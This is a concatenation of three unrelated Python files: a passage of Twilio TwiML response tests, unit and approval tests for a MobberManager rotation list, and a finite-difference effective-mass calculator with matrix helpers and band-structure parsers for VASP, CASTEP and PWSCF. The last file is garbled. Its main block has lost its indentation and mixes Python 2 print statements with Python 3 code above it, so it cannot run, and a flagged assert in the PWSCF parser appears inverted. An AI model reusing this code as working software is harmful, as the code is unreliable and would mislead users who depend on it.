        response = VoiceResponse()
        response.append(gather)
        expected = (
            '<?xml version="1.0" encoding="UTF-8"?><Response><Gather><Say>Hey</Say><Play>hey.mp3</Play>'
            '<Pause /></Gather></Response>'
        )
        assert self.strip(response) == expected
class TestText(TwilioTest):
    """Plain-text children and generic child elements of <Response>."""

    def test_text(self):
        r = VoiceResponse()
        r.append('No tags!')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response>No tags!</Response>'

    def test_mixed(self):
        # BUGFIX: this method was named `text_mixed`, so the test framework
        # never collected it and the case silently never ran.
        r = VoiceResponse()
        r.append('before')
        r.say('Content')
        r.append('after')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response>before<Say>Content</Say>after</Response>'

    def test_add_child(self):
        with VoiceResponse() as r:
            with r.add_child('alexa', omnipresent='true') as alexa:
                alexa.add_child('purchase', 'Kindle')
        assert self.strip(r) == \
            '<?xml version="1.0" encoding="UTF-8"?><Response><alexa omnipresent="true">' \
            '<purchase>Kindle</purchase></alexa></Response>'
| |
import random
import unittest
from approvaltests.approvals import verify
from Infrastructure.MobberManager import MobberManager
class TestsMobberManager(unittest.TestCase):
    """Unit tests for MobberManager list manipulation and its pub/sub callbacks.

    The two subscribe_* tests are golden-file tests: they build a transcript of
    every callback invocation and compare it with approvaltests' verify(), so
    the exact sequence of manager calls must not be reordered.
    """

    def test_empty_mobber_manager_has_no_items(self):
        mobber_manager = MobberManager()
        self.assertEqual(mobber_manager.mobber_count(), 0)

    def test_add_mobber_chris_has_chris(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Chris")
        result = ["Chris"]
        self.assertEqual(mobber_manager.get_mobbers(), result)

    def test_add_mobber_joe_chris_has_joe_chris(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        result = ["Joe", "Chris"]
        self.assertEqual(mobber_manager.get_mobbers(), result)

    # NOTE(review): name says "remove joe" but index 2 removes "John";
    # the assertion matches the actual behavior (removal by index).
    def test_add_mobber_joe_chris_joe__remove_joe_has_joe_chris(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("John")
        mobber_manager.remove_mobber(2)
        result = ["Joe", "Chris"]
        self.assertEqual(mobber_manager.get_mobbers(), result)

    def test_add_4_mobbers_move_up_middle(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("Will")
        mobber_manager.add_mobber("Eric")
        mobber_manager.move_mobber_up(2)
        result = ["Joe", "Will", "Chris", "Eric"]
        self.assertEqual(mobber_manager.get_mobbers(), result)

    # Moving the first entry up wraps: it swaps with the last entry.
    def test_add_4_mobbers_move_up_top(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("Will")
        mobber_manager.add_mobber("Eric")
        mobber_manager.move_mobber_up(0)
        result = ["Eric", "Chris", "Will", "Joe"]
        self.assertEqual(mobber_manager.get_mobbers(), result)

    def test_add_4_mobbers_move_down_middle(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("Will")
        mobber_manager.add_mobber("Eric")
        mobber_manager.move_mobber_down(2)
        result = ["Joe", "Chris", "Eric", "Will"]
        self.assertEqual(mobber_manager.get_mobbers(), result)

    # Moving the last entry down wraps: it swaps with the first entry.
    def test_add_4_mobbers_move_down_bottom(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("Will")
        mobber_manager.add_mobber("Eric")
        mobber_manager.move_mobber_down(3)
        result = ["Eric", "Chris", "Will", "Joe"]
        self.assertEqual(mobber_manager.get_mobbers(), result)

    # Mutating operations on an empty manager must be no-ops, not errors.
    def test_move_down_empty(self):
        mobber_manager = MobberManager()
        mobber_manager.move_mobber_down(0)
        result = []
        self.assertEqual(mobber_manager.get_mobbers(), result)

    def test_move_up_empty(self):
        mobber_manager = MobberManager()
        mobber_manager.move_mobber_up(0)
        result = []
        self.assertEqual(mobber_manager.get_mobbers(), result)

    def test_remove_empty(self):
        mobber_manager = MobberManager()
        mobber_manager.remove_mobber(0)
        result = []
        self.assertEqual(mobber_manager.get_mobbers(), result)

    def test_clear(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("Sam")
        mobber_manager.clear()
        result = []
        self.assertEqual(mobber_manager.get_mobbers(), result)

    def test_subscribe_to_mobber_list_changes(self):
        mobber_manager = MobberManager()
        # Shared mutable transcript; a dict is used so the nested callbacks
        # can rebind fields without `nonlocal`.
        result = {"result": "Mobbers in List for Each Change\n", "increment": 0}

        # Appends one "Action N: ..." line per list-change notification,
        # tagging the current driver and navigator positions.
        def time_change_callback(mobber_list, driver_index, navigator_index):
            result["increment"] += 1
            result["result"] += "Action " + result["increment"].__str__() + ":"
            for mobber_index in range(0, mobber_list.__len__()):
                result["result"] += mobber_list[mobber_index]
                if mobber_index == driver_index:
                    result["result"] += " (Driver)"
                if mobber_index == navigator_index:
                    result["result"] += " (Navigator)"
                result["result"] += ", "
            result["result"] += "\n"
        mobber_manager.subscribe_to_mobber_list_change(time_change_callback)

        def on_mobber_add(mobber_name):
            result["increment"] += 1
            result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " added\n"
        mobber_manager.subscribe_to_mobber_add(on_mobber_add)

        def on_mobber_remove(mobber_name):
            result["increment"] += 1
            result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " removed\n"
        mobber_manager.subscribe_to_mobber_remove(on_mobber_remove)

        # Fixed sequence of operations; the transcript is compared against
        # the approved golden file, so do not reorder these calls.
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("Sam")
        mobber_manager.add_mobber("John")
        mobber_manager.switch_next_driver()
        mobber_manager.add_mobber("Bill")
        mobber_manager.switch_next_driver()
        mobber_manager.switch_next_driver()
        mobber_manager.switch_next_driver()
        mobber_manager.switch_next_driver()
        mobber_manager.switch_next_driver()
        mobber_manager.remove_mobber(2)
        mobber_manager.remove_mobber(0)
        mobber_manager.switch_next_driver()
        mobber_manager.rewind_driver()
        mobber_manager.add_mobber("Seth")
        mobber_manager.rewind_driver()
        mobber_manager.rewind_driver()
        mobber_manager.rewind_driver()
        mobber_manager.move_mobber_down(0)
        mobber_manager.add_mobber("Fredrick")
        mobber_manager.move_mobber_up(2)
        mobber_manager.remove_mobber(1)
        mobber_manager.remove_mobber(0)
        mobber_manager.remove_mobber(0)
        verify(result["result"])

    def test_subscribe_to_mobber_list_changes_random(self):
        # Seed the RNG so the randomized rotation mode is deterministic
        # and the golden transcript stays stable.
        random.seed(0)
        mobber_manager = MobberManager(True)
        result = {"result": "Mobbers in List for Each Change\n", "increment": 0}

        def time_change_callback(mobber_list, driver_index, navigator_index):
            result["increment"] += 1
            result["result"] += "Action " + result["increment"].__str__() + ":"
            for mobber_index in range(0, mobber_list.__len__()):
                result["result"] += mobber_list[mobber_index]
                if mobber_index == driver_index:
                    result["result"] += " (Driver)"
                if mobber_index == navigator_index:
                    result["result"] += " (Next)"
                result["result"] += ", "
            result["result"] += "\n"

        def on_mobber_add(mobber_name):
            result["increment"] += 1
            result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " added\n"
        mobber_manager.subscribe_to_mobber_add(on_mobber_add)

        def on_mobber_remove(mobber_name):
            result["increment"] += 1
            result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " removed\n"
        mobber_manager.subscribe_to_mobber_remove(on_mobber_remove)
        mobber_manager.subscribe_to_mobber_list_change(time_change_callback)

        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.add_mobber("Sam")
        mobber_manager.add_mobber("John")
        mobber_manager.switch_next_driver()
        mobber_manager.add_mobber("Bill")
        mobber_manager.switch_next_driver()
        mobber_manager.switch_next_driver()
        mobber_manager.switch_next_driver()
        mobber_manager.set_mobber_list(["Hello", "Eric", "Joe"])
        mobber_manager.switch_next_driver()
        mobber_manager.switch_next_driver()
        mobber_manager.remove_mobber(2)
        mobber_manager.remove_mobber(0)
        mobber_manager.switch_next_driver()
        mobber_manager.add_mobber("Seth")
        mobber_manager.move_mobber_down(0)
        mobber_manager.add_mobber("Fredrick")
        mobber_manager.move_mobber_up(2)
        mobber_manager.remove_mobber(1)
        mobber_manager.remove_mobber(0)
        mobber_manager.remove_mobber(0)
        verify(result["result"])

    def test_navigator1_driver0_index(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        result = "Navigator: " + str(mobber_manager.next_driver_index) + " Driver: " + str(mobber_manager.driver_index)
        self.assertEqual(result, "Navigator: 1 Driver: 0")

    def test_switch_navigator0_driver1_index(self):
        mobber_manager = MobberManager()
        mobber_manager.add_mobber("Joe")
        mobber_manager.add_mobber("Chris")
        mobber_manager.switch_next_driver()
        result = "Navigator: " + str(mobber_manager.next_driver_index) + " Driver: " + str(mobber_manager.driver_index)
        self.assertEqual(result, "Navigator: 0 Driver: 1")
# Allow running this test module directly (python thisfile.py).
if __name__ == '__main__':
    unittest.main()
| |
#!/usr/bin/env python
EMC_VERSION = '1.51py'
STENCIL = 3  # or 5
#
###################################################################################################
#
# Finite-difference stencils.  Each entry is a displacement, in units of the
# step h, applied to the central k-point.  The ordering of the entries is
# relied upon by the fd_effmass_st3 / fd_effmass_st5 routines.
#
# Three-point stencil: center, +/-1 along each axis, then the four diagonal
# points in each coordinate plane.
st3 = [[0.0, 0.0, 0.0]]                                                                # 0: center
st3 += [[-1.0, 0.0, 0.0], [1.0, 0.0, 0.0]]                                             # dx 1-2
st3 += [[0.0, -1.0, 0.0], [0.0, 1.0, 0.0]]                                             # dy 3-4
st3 += [[0.0, 0.0, -1.0], [0.0, 0.0, 1.0]]                                             # dz 5-6
st3 += [[-1.0, -1.0, 0.0], [1.0, 1.0, 0.0], [1.0, -1.0, 0.0], [-1.0, 1.0, 0.0]]        # dxdy 7-10
st3 += [[-1.0, 0.0, -1.0], [1.0, 0.0, 1.0], [1.0, 0.0, -1.0], [-1.0, 0.0, 1.0]]        # dxdz 11-14
st3 += [[0.0, -1.0, -1.0], [0.0, 1.0, 1.0], [0.0, 1.0, -1.0], [0.0, -1.0, 1.0]]        # dydz 15-18
#
# Five-point stencil: center, +/-1 and +/-2 along each axis, then the full
# 4x4 grid of mixed displacements in each coordinate plane.
a = [-2, -1, 1, 2]
st5 = [[0.0, 0.0, 0.0]]
st5 += [[float(d), 0.0, 0.0] for d in a]                      # dx
st5 += [[0.0, float(d), 0.0] for d in a]                      # dy
st5 += [[0.0, 0.0, float(d)] for d in a]                      # dz
st5 += [[float(dj), float(di), 0.0] for di in a for dj in a]  # dxdy
st5 += [[float(dj), 0.0, float(di)] for di in a for dj in a]  # dxdz
st5 += [[0.0, float(dj), float(di)] for di in a for dj in a]  # dydz
#
# CONSTANTS
#
Bohr = 0.52917721092  # Bohr radius in Angstrom
#
####### FUNCTIONS and __main__ ##################################################################
#
def MAT_m_VEC(m, v):
    """Multiply matrix m (list of rows) by column vector v; return the product list."""
    product = []
    for row in m:
        assert len(v) == len(row), 'Length of the matrix row is not equal to the length of the vector'
        product.append(sum(x * y for x, y in zip(row, v)))
    return product
def T(m):
    """Return the transpose of matrix m (list of rows).

    BUGFIX/generalization: the original index-based version assumed a square
    matrix and raised IndexError for rectangular input; zip(*m) handles any
    list-of-lists and produces the identical result for square matrices.
    """
    return [list(column) for column in zip(*m)]
def N(v):
    """Normalize v by its largest-magnitude component (the component's sign is kept,
    so the dominant entry of the result is exactly 1.0 or the others flip sign)."""
    dominant = 0.
    for component in v:
        if abs(component) > abs(dominant):
            dominant = component
    return [component / dominant for component in v]
def DET_3X3(m):
    """Determinant of a 3x3 matrix by the rule of Sarrus (term order preserved
    so floating-point results match the previous implementation bit-for-bit)."""
    assert len(m) == 3, 'Matrix should be of the size 3 by 3'
    return (m[0][0] * m[1][1] * m[2][2]
            + m[1][0] * m[2][1] * m[0][2]
            + m[2][0] * m[0][1] * m[1][2]
            - m[0][2] * m[1][1] * m[2][0]
            - m[2][1] * m[1][2] * m[0][0]
            - m[2][2] * m[0][1] * m[1][0])
def SCALE_ADJOINT_3X3(m, s):
    """Return s times the classical adjoint (adjugate) of 3x3 matrix m,
    built row by row from the signed cofactors of the transpose."""
    return [
        [s * (m[1][1] * m[2][2] - m[1][2] * m[2][1]),
         s * (m[0][2] * m[2][1] - m[0][1] * m[2][2]),
         s * (m[0][1] * m[1][2] - m[0][2] * m[1][1])],
        [s * (m[1][2] * m[2][0] - m[1][0] * m[2][2]),
         s * (m[0][0] * m[2][2] - m[0][2] * m[2][0]),
         s * (m[0][2] * m[1][0] - m[0][0] * m[1][2])],
        [s * (m[1][0] * m[2][1] - m[1][1] * m[2][0]),
         s * (m[0][1] * m[2][0] - m[0][0] * m[2][1]),
         s * (m[0][0] * m[1][1] - m[0][1] * m[1][0])],
    ]
def INVERT_3X3(m):
    """Invert a 3x3 matrix: the adjugate scaled by the reciprocal determinant.
    Raises ZeroDivisionError for a singular matrix."""
    inv_det = 1.0 / DET_3X3(m)
    return SCALE_ADJOINT_3X3(m, inv_det)
def IS_SYMMETRIC(m):
    """True iff m equals its transpose.  A non-square m triggers IndexError on
    the mirrored lookup, which doubles as an implicit shape check."""
    return all(
        m[i][j] == m[j][i]
        for i in range(len(m))
        for j in range(len(m[i]))
    )
def jacobi(ainput):
    """Diagonalize a symmetric matrix by cyclic Jacobi rotations.

    Returns (v, e): v is the list of eigenvectors (rows), e the eigenvalues,
    both sorted into increasing eigenvalue order.

    BUGFIX: the original raised bare strings ('raise "..."'), which is a
    TypeError on Python >= 2.6; ValueError is raised instead.  The Python 2
    print statement was also converted to the function form, valid on both
    Python 2 and 3.
    """
    # from NWChem/contrib/python/mathutil.py
    # possible need to rewrite due to licensing issues
    #
    from math import sqrt
    #
    a = [[ ainput[i][j] for i in range(len( ainput[j] )) ] for j in range(len( ainput )) ] # copymatrix
    n = len(a)
    m = len(a[0])
    if n != m:
        raise ValueError('jacobi: Matrix must be square')
    #
    for i in range(n):
        for j in range(m):
            if a[i][j] != a[j][i]:
                raise ValueError('jacobi: Matrix must be symmetric')
    #
    tolmin = 1e-14
    tol = 1e-4   # loose start; tightened each sweep below
    #
    v = [[0.0 for i in range(n)] for j in range(n)] # zeromatrix
    for i in range(n):
        v[i][i] = 1.0
    #
    # Largest diagonal magnitude, used to screen negligible off-diagonals.
    maxd = 0.0
    for i in range(n):
        maxd = max(abs(a[i][i]),maxd)
    #
    for iter in range(50):
        nrot = 0
        for i in range(n):
            for j in range(i+1,n):
                aii = a[i][i]
                ajj = a[j][j]
                daij = abs(a[i][j])
                if daij > tol*maxd: # Screen small elements
                    nrot = nrot + 1
                    s = aii - ajj
                    ds = abs(s)
                    if daij > (tolmin*ds): # Check for sufficient precision
                        if (tol*daij) > ds:
                            c = s = 1/sqrt(2.)
                        else:
                            t = a[i][j]/s
                            u = 0.25/sqrt(0.25+t*t)
                            c = sqrt(0.5+u)
                            s = 2.*t*u/c
                        #
                        # Apply the rotation to rows i and j ...
                        for k in range(n):
                            u = a[i][k]
                            t = a[j][k]
                            a[i][k] = s*t + c*u
                            a[j][k] = c*t - s*u
                        #
                        # ... to columns i and j ...
                        for k in range(n):
                            u = a[k][i]
                            t = a[k][j]
                            a[k][i] = s*t + c*u
                            a[k][j]= c*t - s*u
                        #
                        # ... and accumulate it in the eigenvector matrix.
                        for k in range(n):
                            u = v[i][k]
                            t = v[j][k]
                            v[i][k] = s*t + c*u
                            v[j][k] = c*t - s*u
                        #
                        a[j][i] = a[i][j] = 0.0
                        maxd = max(maxd,abs(a[i][i]),abs(a[j][j]))
        #
        if nrot == 0 and tol <= tolmin:
            break
        tol = max(tolmin,tol*0.99e-2)
    #
    if nrot != 0:
        print('jacobi: [WARNING] Jacobi iteration did not converge in 50 passes!')
    #
    # Sort eigenvectors and values into increasing order
    e = [0.0 for i in range(n)] # zerovector
    for i in range(n):
        e[i] = a[i][i]
        for j in range(i):
            if e[j] > e[i]:
                (e[i],e[j]) = (e[j],e[i])
                (v[i],v[j]) = (v[j],v[i])
    #
    return (v,e)
#
def cart2frac(basis, v):
    """Convert Cartesian vector v into fractional coordinates of `basis`
    (rows are basis vectors): multiply by the transposed inverse basis."""
    inv_basis = INVERT_3X3(basis)
    return MAT_m_VEC(T(inv_basis), v)
def fd_effmass_st3(e, h):
    """Second-derivative tensor d2E/dk2 from three-point-stencil energies.

    e -- 19 band energies ordered exactly as the ``st3`` stencil
    h -- finite-difference step
    Prints the symmetric 3x3 tensor and returns it as a nested list.

    FIX: Python 2 `print` statements converted to the parenthesized function
    form, which is valid on both Python 2 and Python 3.
    """
    m = [[0.0 for i in range(3)] for j in range(3)]
    # Diagonal terms: central second difference along each axis.
    m[0][0] = (e[1] - 2.0*e[0] + e[2])/h**2
    m[1][1] = (e[3] - 2.0*e[0] + e[4])/h**2
    m[2][2] = (e[5] - 2.0*e[0] + e[6])/h**2

    # Mixed terms: four-point cross differences in each coordinate plane.
    m[0][1] = (e[7] + e[8] - e[9] - e[10])/(4.0*h**2)
    m[0][2] = (e[11] + e[12] - e[13] - e[14])/(4.0*h**2)
    m[1][2] = (e[15] + e[16] - e[17] - e[18])/(4.0*h**2)

    # symmetrize
    m[1][0] = m[0][1]
    m[2][0] = m[0][2]
    m[2][1] = m[1][2]
    #
    print('-> fd_effmass_st3: Effective mass tensor:\n')
    for i in range(len(m)):
        print('%15.8f %15.8f %15.8f' % (m[i][0], m[i][1], m[i][2]))
    print('')
    #
    return m
def fd_effmass_st5(e, h):
    """Second-derivative tensor d2E/dk2 from five-point-stencil energies.

    e -- 61 band energies ordered exactly as the ``st5`` stencil
    h -- finite-difference step
    Prints the symmetric 3x3 tensor and returns it as a nested list.

    FIX: Python 2 `print` statements converted to the parenthesized function
    form, which is valid on both Python 2 and Python 3.
    """
    m = [[0.0 for i in range(3)] for j in range(3)]
    #
    # Diagonal terms: fourth-order central second differences.
    m[0][0] = (-(e[1]+e[4]) + 16.0*(e[2]+e[3]) - 30.0*e[0])/(12.0*h**2)
    m[1][1] = (-(e[5]+e[8]) + 16.0*(e[6]+e[7]) - 30.0*e[0])/(12.0*h**2)
    m[2][2] = (-(e[9]+e[12]) + 16.0*(e[10]+e[11]) - 30.0*e[0])/(12.0*h**2)
    #
    # Mixed terms: weighted combinations of the 4x4 plane displacements.
    m[0][1] = (-63.0*(e[15]+e[20]+e[21]+e[26]) + 63.0*(e[14]+e[17]+e[27]+e[24]) \
               +44.0*(e[16]+e[25]-e[13]-e[28]) + 74.0*(e[18]+e[23]-e[19]-e[22]))/(600.0*h**2)
    m[0][2] = (-63.0*(e[31]+e[36]+e[37]+e[42]) + 63.0*(e[30]+e[33]+e[43]+e[40]) \
               +44.0*(e[32]+e[41]-e[29]-e[44]) + 74.0*(e[34]+e[39]-e[35]-e[38]))/(600.0*h**2)
    m[1][2] = (-63.0*(e[47]+e[52]+e[53]+e[58]) + 63.0*(e[46]+e[49]+e[59]+e[56]) \
               +44.0*(e[48]+e[57]-e[45]-e[60]) + 74.0*(e[50]+e[55]-e[51]-e[54]))/(600.0*h**2)
    #
    # symmetrize
    m[1][0] = m[0][1]
    m[2][0] = m[0][2]
    m[2][1] = m[1][2]
    #
    print('-> fd_effmass_st5: Effective mass tensor:\n')
    for i in range(3):
        print('%15.8f %15.8f %15.8f' % (m[i][0], m[i][1], m[i][2]))
    print('')
    #
    return m
def generate_kpoints(kpt_frac, st, h, prg, basis):
    """Build the displaced k-points (fractional coords) for a stencil.

    kpt_frac -- central k-point in reduced reciprocal coordinates
    st       -- stencil displacement table (st3 or st5)
    h        -- finite-difference step (1/Bohr)
    prg      -- program identifier; for 'V' (VASP) and 'P' (CASTEP) the step
                is converted to 1/Angstrom
    basis    -- real-space basis vectors as rows

    FIX: Python 2 `print` statement converted to the parenthesized function
    form, valid on both Python 2 and Python 3.
    """
    from math import pi
    #
    # working in the reciprocal space
    m = INVERT_3X3(T(basis))
    basis_r = [[ m[i][j]*2.0*pi for j in range(3) ] for i in range(3) ]
    #
    kpt_rec = MAT_m_VEC(T(basis_r), kpt_frac)
    print('-> generate_kpoints: K-point in reciprocal coordinates: %5.3f %5.3f %5.3f' % (kpt_rec[0], kpt_rec[1], kpt_rec[2]))
    #
    if prg == 'V' or prg == 'P':
        h = h*(1/Bohr) # [1/A]
    #
    kpoints = []
    for i in range(len(st)):
        k_c_ = [ kpt_rec[j] + st[i][j]*h for j in range(3) ] # getting displaced k points in Cartesian coordinates
        k_f = cart2frac(basis_r, k_c_)
        kpoints.append( [k_f[0], k_f[1], k_f[2]] )
    #
    return kpoints
def parse_bands_CASTEP(eigenval_fh, band, diff2_size, debug=False):
    """Collect the energies of band `band` from a CASTEP .bands file handle.

    Reads the four header lines (k-point count, spin components, electron
    counts, eigenvalue count), then scans the rest of the file and appends
    the `band`-th eigenvalue of every 'Spin component 1' block.

    NOTE(review): `nelec` / `n_electrons_down` are parsed but never used, and
    for spin_components == 1 `nelec` is an int while for 2 it is a one-element
    list — presumably leftover scaffolding; verify before relying on them.
    NOTE(review): unlike the VASP/PWSCF parsers, `diff2_size` and `debug` are
    unused here — confirm the caller does not expect a length check.
    """
    # Number of k-points X
    nkpt = int(eigenval_fh.readline().strip().split()[3])
    # Number of spin components X
    spin_components = float(eigenval_fh.readline().strip().split()[4])
    # Number of electrons X.00 Y.00
    tmp = eigenval_fh.readline().strip().split()
    if spin_components == 1:
        nelec = int(float(tmp[3]))
        n_electrons_down = None
    elif spin_components == 2:
        nelec = [float(tmp[3])]
        n_electrons_down = int(float(tmp[4]))
    # Number of eigenvalues X
    nband = int(eigenval_fh.readline().strip().split()[3])
    energies = []
    # Get eigenenergies and unit cell from .bands file
    while True:
        line = eigenval_fh.readline()
        if not line:
            break
        #
        if 'Spin component 1' in line:
            # One eigenvalue per line; keep only the requested band.
            for i in range(1, nband + 1):
                energy = float(eigenval_fh.readline().strip())
                if band == i:
                    energies.append(energy)
    return energies
def parse_EIGENVAL_VASP(eigenval_fh, band, diff2_size, debug=False):
    """Extract `diff2_size` energies (in Hartree) of band `band` from a VASP
    EIGENVAL file handle.

    FIXES: Python 2 `print` statements converted to the function form (valid
    on both 2 and 3), and `sys` is imported locally — the module only imported
    it inside the `__main__` section, so calling this function from an import
    raised NameError on the error path.
    """
    import sys
    ev2h = 1.0/27.21138505   # eV -> Hartree
    eigenval_fh.seek(0) # just in case
    # Skip the five-line EIGENVAL header.
    eigenval_fh.readline()
    eigenval_fh.readline()
    eigenval_fh.readline()
    eigenval_fh.readline()
    eigenval_fh.readline()
    #
    nelec, nkpt, nband = [int(s) for s in eigenval_fh.readline().split()]
    if debug: print('From EIGENVAL: Number of the valence band is %d (NELECT/2)' % (nelec/2))
    if band > nband:
        print('Requested band (%d) is larger than total number of the calculated bands (%d)!' % (band, nband))
        sys.exit(1)
    energies = []
    for i in range(diff2_size):
        eigenval_fh.readline() # empty line
        eigenval_fh.readline() # k point coordinates
        for j in range(1, nband+1):
            line = eigenval_fh.readline()
            if band == j:
                # Column 1 is the band index, column 2 the energy in eV.
                energies.append(float(line.split()[1])*ev2h)
    if debug: print('')
    return energies
#
def parse_nscf_PWSCF(eigenval_fh, band, diff2_size, debug=False):
    """Collect `diff2_size` energies (Hartree) of band `band` from a PWSCF
    (Quantum ESPRESSO) nscf output file handle.

    Scans for the 'End of band structure calculation' marker, then for each
    of the diff2_size k-points gathers the whitespace-separated eigenvalues
    printed between the 'k =' header and the following blank line.
    """
    ev2h = 1.0/27.21138505   # eV -> Hartree
    eigenval_fh.seek(0) # just in case
    engrs_at_k = []          # NOTE(review): never populated or returned — dead variable
    energies = []
    #
    while True:
        line = eigenval_fh.readline()
        if not line:
            break
        #
        if "End of band structure calculation" in line:
            for i in range(diff2_size):
                #
                # Advance to the next k-point block; 'occupation numbers'
                # terminates the eigenvalue listing of that block.
                while True:
                    line = eigenval_fh.readline()
                    if "occupation numbers" in line:
                        break
                    #
                    if "k =" in line:
                        a = [] # energies at a k-point
                        eigenval_fh.readline() # empty line
                        #
                        while True:
                            line = eigenval_fh.readline()
                            if line.strip() == "": # empty line
                                break
                            #
                            a.extend(line.strip().split())
                #
                #print a
                # NOTE(review): the condition looks inverted — a[band-1] needs
                # len(a) >= band, so `len(a) <= band` only admits len(a) == band;
                # confirm against a real nscf output before changing.
                assert len(a) <= band, 'Length of the energies array at a k-point is smaller than band param'
                energies.append(float(a[band-1])*ev2h)
    #
    #print engrs_at_k
    return energies
#
def parse_inpcar(inpcar_fh, debug=False):
    """Parse the INPCAR control file.

    Expected layout (one item per line): k-point (3 floats), stepsize (float),
    band (int), program identifier (1 char), then three basis-vector lines
    (3 floats each; units depend on the program identifier).

    Returns (kpt, stepsize, band, prg, basis).  Prints a message and exits the
    process on malformed input.

    FIX: Python 2 `print` statements converted to the parenthesized function
    form, which is valid on both Python 2 and Python 3.
    """
    import sys
    import re
    #
    kpt = []       # k-point at which eff. mass in reciprocal reduced coords (3 floats)
    stepsize = 0.0 # stepsize for finite difference (1 float) in Bohr
    band = 0       # band for which eff. mass is computed (1 int)
    prg = ''       # program identifier (1 char)
    basis = []     # basis vectors in cartesian coords (3x3 floats), units depend on the program identifier
    #
    inpcar_fh.seek(0) # just in case
    p = re.search(r'^\s*(-*\d+\.\d+)\s+(-*\d+\.\d+)\s+(-*\d+\.\d+)', inpcar_fh.readline())
    if p:
        kpt = [float(p.group(1)), float(p.group(2)), float(p.group(3))]
        if debug: print("Found k point in the reduced reciprocal space: %5.3f %5.3f %5.3f" % (kpt[0], kpt[1], kpt[2]))
    else:
        print("Was expecting k point on the line 0 (3 floats), didn't get it, exiting...")
        sys.exit(1)

    p = re.search(r'^\s*(\d+\.\d+)', inpcar_fh.readline())
    if p:
        stepsize = float(p.group(1))
        if debug: print("Found stepsize of: %5.3f (1/Bohr)" % stepsize)
    else:
        print("Was expecting a stepsize on line 1 (1 float), didn't get it, exiting...")
        sys.exit(1)

    p = re.search(r'^\s*(\d+)', inpcar_fh.readline())
    if p:
        band = int(p.group(1))
        if debug: print("Requested band is : %5d" % band)
    else:
        print("Was expecting band number on line 2 (1 int), didn't get it, exiting...")
        sys.exit(1)

    p = re.search(r'^\s*(\w)', inpcar_fh.readline())
    if p:
        prg = p.group(1)
        if debug: print("Program identifier is: %5c" % prg)
    else:
        print("Was expecting program identifier on line 3 (1 char), didn't get it, exiting...")
        sys.exit(1)

    for i in range(3):
        p = re.search(r'^\s*(-*\d+\.\d+)\s+(-*\d+\.\d+)\s+(-*\d+\.\d+)', inpcar_fh.readline())
        if p:
            basis.append([float(p.group(1)), float(p.group(2)), float(p.group(3))])

    if debug:
        print("Real space basis:")
        for i in range(len(basis)):
            print('%9.7f %9.7f %9.7f' % (basis[i][0], basis[i][1], basis[i][2]))
    if debug: print('')

    return kpt, stepsize, band, prg, basis
def get_eff_masses(m, basis):
    """Diagonalize the d2E/dk2 tensor and return the principal effective masses.

    Returns (em, vecs_cart, vecs_frac, vecs_n): reciprocal eigenvalues and the
    eigenvectors in Cartesian, fractional, and max-normalized fractional form.
    """
    eigvec, eigval = jacobi(m)
    #
    vecs_cart, vecs_frac, vecs_n = [], [], []
    for axis in range(3):
        cart = eigvec[axis]
        frac = cart2frac(basis, cart)
        vecs_cart.append(cart)
        vecs_frac.append(frac)
        vecs_n.append(N(frac))
    #
    # Effective mass is the inverse curvature along each principal axis.
    em = [1.0/value for value in eigval]
    return em, vecs_cart, vecs_frac, vecs_n
#
if __name__ == "__main__":
import sys
import re
import datetime
import time
filename = 'emcpy.out_'+str(int(time.time()))
print 'Redirecting output to '+filename
sys.stdout = open(filename, 'w')
#
if STENCIL == 3:
fd_effmass = fd_effmass_st3
st = st3
elif STENCIL == 5:
fd_effmass = fd_effmass_st5
st = st5
else:
print 'main: [ERROR] Wrong value for STENCIL, should be 3 or 5.'
sys.exit(1)
#
print 'Effective mass calculator '+EMC_VERSION
print 'Stencil: '+str(STENCIL)
print 'License: MIT'
print 'Developed by: Alexandr Fonari and Chris Sutton'
print 'Started at: '+datetime.datetime.now().strftime("%Y-%m-%d %H:%M")+'\n'
#
if len(sys.argv) == 1:
print "Run as:"
print " %s input.in [output.out]" % sys.argv[0]
print ""
sys.exit(1)
inpcar_fn = sys.argv[1]
#
try:
inpcar_fh = open(inpcar_fn, 'r')
except IOError:
sys.exit("Couldn't open input file "+inpcar_fn+", exiting...\n")
#
print "Contents of the "+inpcar_fn+" file:\n"
print inpcar_fh.read()
print ""
print "=========="
print ""
#
kpt, stepsize, band, prg, basis = parse_inpcar(inpcar_fh)
#
output_fn = None
if len(sys.argv) > 2:
output_fn = sys.argv[2]
try:
output_fh = open(output_fn, 'r')
except IOError:
sys.exit("Couldn't open input file "+output_fn+", exiting...\n")
#
if output_fn:
print 'Successfully opened '+output_fn+', preparing to parse it...\n'
#
energies = []
if prg.upper() == 'V' or prg.upper() == 'C':
energies = parse_EIGENVAL_VASP(output_fh, band, len(st))
m = fd_effmass(energies, stepsize)
#
if prg.upper() == 'Q':
energies = parse_nscf_PWSCF(output_fh, band, len(st))
m = fd_effmass(energies, stepsize)
#
if prg.upper() == 'P':
energies = parse_bands_CASTEP(output_fh, band, len(st))
m = fd_effmass(energies, stepsize)
#
